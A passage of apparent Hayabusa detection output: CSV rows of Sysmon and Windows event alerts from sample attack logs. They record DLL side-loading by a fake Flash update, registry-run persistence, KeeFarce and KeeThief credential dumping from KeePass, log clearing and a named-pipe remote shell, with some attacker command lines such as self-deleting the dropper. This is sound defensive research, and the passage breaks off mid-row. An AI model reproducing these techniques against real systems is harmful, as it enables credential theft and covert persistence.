SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.837 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.837 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.837 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.853 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=4E14894860034FEFBAB41CFE9A763D8061D19EF9,MD5=2D8FB1F82724CF542CD2E3A5E041FB52,SHA256=ECE29E4AF4B33C02DAFAC24748A9C125B057E39455ACF3C45464DB36BFE74881,IMPHASH=9599F61759CDFD742AFA0B8EC24B5599",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.853 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.868 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.868 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.868 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.884 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1060,technique_name=Registry Run Keys / Start Folder | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Run\360v: C:\Users\IEUser\AppData\Roaming\svchost.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.884 +00:00,IEWIN7,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.931 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2992 | Src PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Tgt PID: 3076 | Tgt PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.931 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /A | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | LID: 0xf4be | PID: 3076 | PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.931 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:54.134 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 3188 | PGUID: 365ABB72-7C02-5CC4-0000-0010FD6E0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:54.165 +00:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 18:47:00.046 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: KeeFarce.exe | Process: C:\Users\Public\KeeFarce.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xffa8 | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=C622268A9305BA27C78ECB5FFCC1D43B019847B5,MD5=07D86CD24E11C1B8F0C2F2029F9D3466,SHA256=F0D5C8E6DF82A7B026F4F0412F8EDE11A053185675D965215B1FFBBC52326516,IMPHASH=D94F14D149DD5809F1B4D1C38A1B4E40",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-27 18:47:00.046 +00:00,IEWIN7,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-27 18:47:00.062 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2364 | PGUID: 365ABB72-A201-5CC4-0000-00104F500800 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-27 18:47:00.062 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Users\Public\KeeFarce.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-27 18:47:00.062 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\Public\KeeFarce.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 1288 | Src PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-27 18:47:00.124 +00:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\Public\KeeFarce.exe | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-27 18:55:04.710 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-27 18:55:04.710 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-27 18:55:04.710 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-27 18:55:04.980 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-27 18:55:04.980 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-27 18:55:04.980 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-27 19:27:55.274 +00:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx +2019-04-27 21:04:25.733 +00:00,DESKTOP-JR78RLP,104,high,Evas,System Log File Cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-27 21:04:32.373 +00:00,DESKTOP-JR78RLP,7040,medium,Evas,Event Log Service Startup Type Changed To Disabled,Old Setting: auto start | New Setting: disabled,rules/hayabusa/default/alerts/System/7040_EventLogServiceStartupDisabled.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-28 16:29:42.988 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x800 | Src PID: 860 | Src PGUID: 365ABB72-D3C2-5CC5-0000-0010D9790500 | Tgt PID: 748 | Tgt PGUID: 365ABB72-D3E8-5CC5-0000-0010E7D30500,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-29 20:59:14.447 +00:00,IEWIN7,18,info,,Pipe Connected,\46a676ab7f179e511e30dd2dc41bd388 | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:14.447 +00:00,IEWIN7,18,critical,Evas | PrivEsc,Malicious Named Pipe,,rules/sigma/pipe_created/pipe_created_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:15.575 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.17:63025 (NLLT106876) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:21.539 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x10896 | PID: 3376 | PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:21.539 +00:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3940 | Src PGUID: 365ABB72-6231-5CC7-0000-00104CF71800 | Tgt PID: 3376 | Tgt PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:21.539 +00:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:21.539 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:22.144 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | LID: 0x10896 | PID: 2116 | PGUID: 365ABB72-65AA-5CC7-0000-00104D882400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:22.144 +00:00,IEWIN7,10,low,,Process Access,Src Process: io\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3376 | Src PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400 | Tgt PID: 2116 | Tgt PGUID: 365ABB72-65AA-5CC7-0000-00104D882400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:22.144 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:22.144 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:22.144 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:55.472 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x10896 | PID: 2244 | PGUID: 365ABB72-65CB-5CC7-0000-001002202600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 07:22:56.571 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Temp\opera autoupdate\installer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 2784 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010CB280E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:22:56.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:22:57.149 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3624 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.883 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-F69F-5CC7-0000-0010132B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.883 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001033480000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A74B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src 